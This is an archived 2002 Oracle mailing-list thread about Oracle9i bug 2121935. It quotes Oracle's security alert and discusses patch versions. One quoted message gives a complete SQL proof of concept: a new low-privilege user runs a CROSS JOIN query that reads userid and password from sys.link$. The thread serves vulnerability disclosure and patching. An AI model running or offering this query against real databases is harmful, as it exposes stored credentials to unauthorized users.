RE: security bug - join syntax
Bug is fixed in 9.0.1.3 (or was it .2, I forget), and is not present in 9.2 (9iR2). A backport for 9.0.1.1 is available as I recall. Robert G. Freeman - Oracle OCP Oracle Database Architect CSX Midtier Database Administration Author Oracle9i RMAN Backup and Recovery (Oracle Press - Oct 2002) Oracle9i New Features (Oracle Press) Mastering Oracle8i (Sybex) Clark Griswold: Eddie, has anyone ever told you that you're bad luck? Cousin Eddie: Those were my mother's dying words. But I guess if your body's covered in third degree burns, and your foot's caught in a bear trap, you tend to start talkin' crazy. -Original Message- Sent: Friday, July 19, 2002 2:58 PM To: Multiple recipients of list ORACLE-L Is this still a problem in 9iR2? I do not have it installed yet :( - Kirti > -Original Message- > From: [EMAIL PROTECTED] [SMTP:[EMAIL PROTECTED]] > Sent: Friday, July 19, 2002 12:05 PM > To: Multiple recipients of list ORACLE-L > Subject: Re: security bug - join syntax > > Thanks Linda. > > Usenet seems to be a little behind the curve though. > > Jonathan Lewis discovered this and posted on the list > ( you saw it here first! ) over a month ago. > > Jared > > > > > > [EMAIL PROTECTED] > Sent by: [EMAIL PROTECTED] > 07/19/2002 09:23 AM > Please respond to ORACLE-L > > > To: Multiple recipients of list ORACLE-L > <[EMAIL PROTECTED]> > cc: > Subject:Re: security bug - join syntax > > > > This just in from comp.databases.oracle.server. > > See metalink bug 2121935. > > Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) > allows you to view data from tables on which you have no > privilege. For example, try this COMPLETE script: > > connect / as sysdba > create user us1 identified by us1; > grant create session to us1; > > connect us1/us1 > > select userid, password > from > sys.link$ cross join dual > ; > > > > > "Adams, Matthew (GEA, MABG, 088130)" <[EMAIL PROTECTED]>@fatcity.com > on 07/19/2002 11:04:17 AM > > Please respond to [EMAIL PROTECTED] > > > > Sent by: [EMAIL PROTECTED] > > > To: Multiple recipients of list ORACLE-L <[EMAIL PROTECTED]> > cc: > > > > > Anybody remember the bug number for the security issue > with the new join syntax in 9i? > > > Matt Adams - GE Appliances - [EMAIL PROTECTED] > The ozone layer or cheese in a spray can. > Don't make me choose. > > > > > -- > Please see the official ORACLE-L FAQ: http://www.orafaq.com > -- > Author: > INET: [EMAIL PROTECTED] > > Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 > San Diego, California-- Public Internet access / Mailing Lists > > To REMOVE yourself from this mailing list, send an E-Mail message > to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in > the message BODY, include a line containing: UNSUB ORACLE-L > (or the name of mailing list you want to be removed from). You may > also send the HELP command for other information (like subscribing). > > > > -- > Please see the official ORACLE-L FAQ: http://www.orafaq.com > -- > Author: > INET: [EMAIL PROTECTED] > > Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 > San Diego, California-- Public Internet access / Mailing Lists > > To REMOVE yourself from this mailing list, send an E-Mail message > to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in > the message BODY, include a line containing: UNSUB ORACLE-L > (or the name of mailing list you want to be removed from). You may > also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Deshpande, Kirti INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Freeman, Robert INET: [EMAIL PROTECTED] Fat City Network S
RE: security bug - join syntax
re: Bug 2121935 ---metalink excerpts--- Doc ID: 190077.1 List of Bugs fixed in Oracle9i Release 2 base release (9.2.0.1) This is a listing of the main bugs fixed in the Oracle9i Release 2 base release. The bugs are listed in categories related to the product area and/or symptom of the bug. A bug may be listed in more than one section. * indicates that an alert exists for this bug. + indicates a particularly notable bug. "OERI" is used as a short notation for ORA-600. Bug Fixes by Category ... Security ... 2121935* User Privileges Vulnerability in Oracle9i Database Server ... * Fixed: 9201 Security This problem is introduced in Oracle9i (9.0.1). There is a user privileges vulnerability in Oracle9i Database Server.. See ... --- Doc ID: Note:185074.1 Subject: ALERT: User Privileges Vulnerability in Oracle9i Database Server Type: ALERT Status: PUBLISHED Content Type: TEXT/PLAIN Creation Date: 18-APR-2002 Last Revision Date: 25-APR-2002 Oracle Security Alert #33 Dated: 17 April 2002 User Privileges Vulnerability in Oracle9i Database Server Description ~~~ A potential security vulnerability has been discovered in Oracle9i database server. It is possible to create a user defined in the Oracle9i database server with limited privileges who can potentially access privileged data using SQL syntax for outer joins. As such, a knowledgeable and malicious user can gain unauthorized access to data in Oracle9i database server. None of the Oracle8i (Release 8.1.x), Oracle8 (Release 8.0.x) or Oracle7 database server release is affected by this vulnerability. Products affected ~ Oracle9i Database, Release 9.0.1.x, only Platforms affected ~~ All Workarounds ~~~ There are no workarounds to protect against this potential vulnerability. Patch Information ~ Oracle has fixed the potential vulnerability identified above in the upcoming Oracle Database server release, Oracle9i, Release 2. Patches with the base bug number, 2121935 are being made available only for supported releases of Oracle9i, Releases 9.0.1.x, database server on all supported platforms. For Windows NT and 2000, the patch is included in 2338791 for 9.0.1.3. Download currently available patches for your platform from Oracle Support web site, iSupport, http://metalink.oracle.com. Activate the "Patches" button to get to the patches Web page. Enter the base bug fix number indicated above and activate the "Submit" button. Please check MetaLink or, Oracle Support Services periodically for patch availability if the patch for your platform is not yet available. Oracle strongly recommends that you comprehensively test the stability of your system upon application of any patch prior to deleting any of the original file(s) that are replaced by the patch. Change Record ~ Windows NT and 2000 bug information was addded to the Patch Information section of this alert on 25-Apr-02. . - --- Copyright (c) 1995,2000 Oracle Corporation. All Rights Reserved. Legal Notices and Terms of Use. On 19 Jul 2002 at 10:58, Deshpande, Kirti wrote: Date sent: Fri, 19 Jul 2002 10:58:26 -0800 <[EMAIL PROTECTED]> To: Multiple recipients of list ORACLE-L Send reply to: [EMAIL PROTECTED] Organization: Fat City Network Services, San Diego, California > Is this still a problem in 9iR2? I do not have it installed yet :( > > - Kirti > > > -Original Message- > > From: [EMAIL PROTECTED] [SMTP:[EMAIL PROTECTED]] > > Sent: Friday, July 19, 2002 12:05 PM > > To: Multiple recipients of list ORACLE-L > > Subject:Re: security bug - join syntax > > > > Thanks Linda. > > > > Usenet seems to be a little behind the curve though. > > > > Jonathan Lewis discovered this and posted on the list > > ( you saw it here first! ) over a month ago. > > > > Jared > > > > > > > > > > > > [EMAIL PROTECTED] > > Sent by: [EMAIL PROTECTED] > > 07/19/2002 09:23 AM > > Please respond to ORACLE-L > > > > > > To: Multiple recipients of list ORACLE-L > > <[EMAIL PROTECTED]> > > cc: > > Subject:Re: security bug - join syntax > > > > > > > > This just in from comp.databases.oracle.server. > > > > See metalink bug 2121935. -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Eric D. Pierce INET: [EMAIL PROTECTED] Fat City Network Ser